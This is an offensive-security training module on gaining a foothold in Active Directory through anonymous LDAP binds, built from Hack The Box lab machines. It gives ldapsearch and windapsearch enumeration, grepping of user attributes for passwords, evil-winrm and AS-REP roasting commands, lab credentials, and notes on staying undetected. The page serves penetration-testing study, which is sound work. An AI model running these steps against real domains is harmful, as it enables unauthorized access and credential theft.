Back to All Modules

Anonymous LDAP to Foothold

#Overview

Active Directory domains that permit anonymous LDAP binds expose all domain objects to unauthenticated attackers. User objects often contain plaintext or Base64-encoded passwords in attributes such as description, info, userPassword, labeledUri, personalTitle, and custom attributes added by applications. This technique is entirely passive and undetectable beyond the initial LDAP connection. Combined with password spraying against the discovered users, anonymous LDAP provides a reliable entry point into the domain.

#Prerequisites

  • Network access to the DC on port 389 (LDAP) or 636 (LDAPS)
  • Anonymous LDAP bind must be enabled (common on pre-2020 DCs and misconfigured environments)

#Detection & Enumeration

#Verify Anonymous Bind

# ldapsearch with -x (anonymous authentication)
ldapsearch -x -H ldap://10.10.10.161:389 -b "dc=htb,dc=local"
# If results are returned, anonymous bind is enabled

# windapsearch with no credentials — auto-tests anonymous bind
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
# [+] ...success! Binded as: None  -> anonymous bind accepted
BASH

#Enumerate All Users

# windapsearch: enumerate all users with objectCategory=user
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U

# ldapsearch: enumerate all users
ldapsearch -x -H 'ldap://10.10.10.161' -b "dc=htb,dc=local" \
  "(&(objectCategory=person)(objectClass=user))" samaccountname | grep sAMAccountName

# List ALL objects in the domain (313 objects on Forest, 28 users)
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
BASH

#Enumerate Groups with WinRM Access

# Check which users are in Remote Management Users group
./windapsearch.py -d MEGABANK.LOCAL --dc-ip 10.10.10.172 -U -m "Remote Management Users"
# User mhope was found in this group (Monteverde)
BASH

#Exploitation / Execution

#Password Extraction from User Attributes

Key user attributes that commonly contain credentials:

AttributeDescriptionExample Finding
descriptionUser description fielddavid.orelious had aRt$Lp#7t*VQ!3 in description (Cicada)
infoGeneral information fieldMay contain passwords for helpdesk reference
userPasswordLegacy password attributeSometimes contains Base64 password
personalTitleTitle fieldOccasionally used for password storage
commentComment fieldMay contain credentials
custom attributesApplication-specific (e.g., cascadeLegacyPwd)r.thompson had cascadeLegacyPwd (Cascade)
labeledUriURI fieldSometimes abused for credential storage

#Windapsearch with Full Attributes

# Enumerate all users with ALL attributes (--full flag)
./windapsearch.py -U --full --dc-ip 10.10.10.182
# Examine output for unusual attributes like cascadeLegacyPwd, userPassword

# Search for passwords in descriptions
./windapsearch.py -U --full --dc-ip 10.10.10.182 | grep -i -E 'pass|pwd|secret'
BASH

#Decoding Base64 Credentials

# cascadeLegacyPwd contained Base64 encoded password
echo "clk0bjBldGg=" | base64 -d
# Output: rY4n5eva

# Some attributes may contain double-encoded values
echo "<base64_string>" | base64 -d | base64 -d
BASH

#Post-Credential Authentication

# Test for WinRM access (credentials from anonymous LDAP findings)
evil-winrm -i 10.10.10.182 -u r.thompson -p 'rY4n5eva'
# If WinRM is not accessible, try SMB share enumeration
smbmap -H 10.10.10.182 -u r.thompson -p 'rY4n5eva'

# Test for SMB access
netexec smb 10.10.10.10 -u <user> -p '<pass>'
BASH

#Real-World Chain (Cascade)

# 1. Anonymous LDAP -> windapsearch user with cascadeLegacyPwd attribute
./windapsearch.py -U --full --dc-ip 10.10.10.182
# Found: r.thompson with cascadeLegacyPwd (Base64) -> rY4n5eva

# 2. Enumerate SMB shares with r.thompson credentials
smbmap -H 10.10.10.182 -u r.thompson -p 'rY4n5eva'
# Found Data share with IT folder -> VNC registry backup -> TightVNC password decryption

# 3. s.smith -> Audit share -> SQLite DB -> AES encrypted password -> ArkSvc

# 4. ArkSvc in AD Recycle Bin group -> recover TempAdmin deleted object -> Administrator password
BASH

#Real-World Chain (Forest)

# 1. Anonymous LDAP -> windapsearch discovers svc-alfresco
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
# svc-alfresco discovered with 312 total objects

# 2. svc-alfresco has pre-auth disabled (Alfresco documentation reveals this)
GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
# Cracked: s3rvice -> WinRM shell

# 3. Account Operators membership -> add user to Exchange Windows Permissions -> DCSync
BASH

#Common Pitfalls

  • Anonymous bind not allowed: The DC returns "authentication required". Try SMB null sessions instead, or find another entry vector.
  • No passwords in attributes: Not all domains store passwords in user attributes. Move to password spraying with the discovered username list.
  • Attribute values encoded: Some values may be double-Base64 encoded or use custom application encoding. Examine the application context.
  • Account disabled or expired: Check userAccountControl flags before attempting authentication.

#OPSEC Considerations

  • Anonymous LDAP binds are logged on the DC, but are common enough to not trigger alerts in most environments
  • Querying user attributes is passive and does not generate authentication events
  • This technique is identical to normal LDAP directory lookups used by applications
  • The enumeration is not tied to specific user activities; it appears as a generic directory query

#Post-Exploitation Value

  • Valid credentials for domain-joined user accounts
  • Comprehensive user list for password spraying
  • Knowledge of AD structure, groups, and privilege assignments
  • Potential for discovering pre-auth disabled accounts (enables AS-REP roasting)

#Cross-References

#Tool References

ToolLink
windapsearchhttps://github.com/ropnop/windapsearch
ldapsearchBuilt into Kali; ldap-utils package
smbmaphttps://github.com/ShawnDEvans/SMBMap

#Source Machines

  • Cascade (Medium) — Anonymous LDAP -> cascadeLegacyPwd (Base64) -> r.thompson -> VNC decryption -> s.smith -> SQLite DB -> ArkSvc -> AD Recycle Bin -> Administrator
  • Forest (Easy) — Anonymous LDAP -> windapsearch discovers svc-alfresco (pre-auth disabled) -> AS-REP roasting -> s3rvice -> Account Operators -> DCSync
  • Monteverde (Medium) — Anonymous LDAP -> windapsearch user list -> password spray -> SABatchJobs -> Azure AD Connect password extraction -> Administrator